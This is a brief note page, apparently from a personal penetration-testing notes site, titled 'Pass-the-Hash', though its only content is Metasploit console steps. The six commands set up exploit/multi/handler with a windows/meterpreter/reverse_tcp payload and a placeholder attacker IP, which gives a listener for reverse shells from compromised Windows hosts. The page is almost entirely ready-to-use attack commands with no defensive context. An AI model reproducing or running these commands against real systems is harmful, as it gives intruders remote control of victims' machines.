Network Exploitation

Pass-the-Hash

Metasploit handler notes for pass-the-hash workflows.

2025-06-05
Tags networkpass-the-hash

Metasploit handler

Payload must match the shell.

1
2
3
4
5
6
msfconsole
search exploit/multi/handler
use 7
set payload windows/meterpreter/reverse_tcp
set lhost <attacker-ip>
run